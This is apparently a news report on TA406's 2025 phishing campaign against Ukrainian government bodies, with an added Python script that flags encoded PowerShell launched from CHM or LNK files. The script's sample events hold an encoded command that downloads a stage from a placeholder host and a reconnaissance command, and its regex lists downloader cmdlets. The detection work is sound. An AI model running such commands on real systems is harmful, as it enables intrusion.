North Korean state-sponsored threat actor TA406 has launched a series of phishing attacks against Ukrainian government entities, according to a new report from cybersecurity firm Proofpoint. The campaigns, which began in February 2025, aim to harvest credentials and deliver malware, likely to gather intelligence related to the ongoing Russian invasion of Ukraine.
TA406, a group linked to the Democratic People's Republic of Korea (DPRK) and overlapping with threat actors tracked as Opal Sleet and Konni, has historically targeted government institutions in Russia.
Using freemail accounts, TA406 posed as a think tank member, impersonating a fictitious analyst from a fake organization called the Royal Institute of Strategic Studies. The phishing emails leveraged political themes, including references to former Ukrainian military chief Valeriy Zaluzhnyi, to trick targets into downloading malicious files.
Victims were prompted to access a MEGA-hosted RAR archive titled Analytical Report.rar. Once decrypted, it dropped a CHM file containing HTML pages with embedded PowerShell scripts. The scripts initiated reconnaissance of the victim's system upon user interaction. In some cases, TA406 followed up with additional emails urging recipients to download the file if they had not already done so.
The group also employed alternate delivery methods, including HTML email attachments that linked to ZIP files containing both benign PDFs and malicious LNK files. If executed, the LNK files launched Base64-encoded PowerShell to begin the infection chain.
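Both delivery chains described above end in PowerShell being spawned from an unusual parent (the CHM viewer hh.exe, or the shell when a user double-clicks a LNK), often with an encoded command line. The following triage script is an added example written for this page, not code from Proofpoint or from the report; the process-creation events it inspects are constructed Sysmon-style records, and the domain in them is a reserved placeholder.

```python
import base64
import re

# -EncodedCommand and the abbreviations PowerShell accepts for it (-e, -ec, -en, -enc).
ENC_RE = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)
# Cmdlets and aliases typical of a second-stage downloader in the decoded script.
DOWNLOADER_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|\biex\b", re.IGNORECASE)
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

def _enc(script):
    """Encode a script the way -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16le")).decode()

# Constructed process-creation events (Sysmon-style fields) written for this example.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\hh.exe", "Image": PS,          # CHM viewer as parent
     "CommandLine": "powershell.exe -w hidden -nop -enc " + _enc("whoami; systeminfo")},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,    # user double-clicked a .lnk
     "CommandLine": "powershell.exe -NoP -W Hidden -EncodedCommand "
                    + _enc("Invoke-WebRequest http://example.invalid/stage -OutFile s.ps1")},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,    # benign interactive shell
     "CommandLine": "powershell.exe -NoLogo -ExecutionPolicy RemoteSigned"},
]

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage_event(event):
    """Return the reasons an event is suspicious; an empty list means not flagged."""
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    if image not in ("powershell.exe", "pwsh.exe"):
        return []
    reasons, decoded = [], decode_encoded_command(event["CommandLine"])
    if decoded is not None:
        reasons.append("encoded command: " + decoded[:40])
        if DOWNLOADER_RE.search(decoded):
            reasons.append("decoded payload fetches remote content")
    if parent == "hh.exe":
        reasons.append("PowerShell spawned by the CHM viewer hh.exe")
    elif parent == "explorer.exe" and decoded is not None:
        reasons.append("encoded PowerShell launched from the shell (LNK double-click pattern)")
    return reasons
```

Running `triage_event` over each record flags the first two events and leaves the interactive shell alone; the decoded script is returned so an analyst can read what the stage actually does rather than the opaque Base64.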
Before deploying malware, TA406 attempted credential harvesting by sending fraudulent Microsoft security alerts from Proton Mail accounts. The emails directed users to a spoofed login page hosted on a compromised domain, jetmf[.]com. Though the phishing page was unavailable during analysis, the domain had previously been linked to similar activity targeting users of the South Korean service Naver.
“Proofpoint assesses TA406 is targeting Ukrainian government entities to better understand the appetite to continue fighting against the Russian invasion and assess the medium-term outlook of the conflict,” the researchers said. “North Korea committed troops to assist Russia in the fall of 2024, and TA406 is very likely gathering intelligence to help North Korean leadership determine the current risk to its forces already in the theatre, as well as the likelihood that Russia will request more troops or armaments. Unlike Russian groups who have likely been tasked with gathering tactical battlefield information and targeting of Ukrainian forces in situ, TA406 has typically focused on more strategic, political intelligence collection efforts.”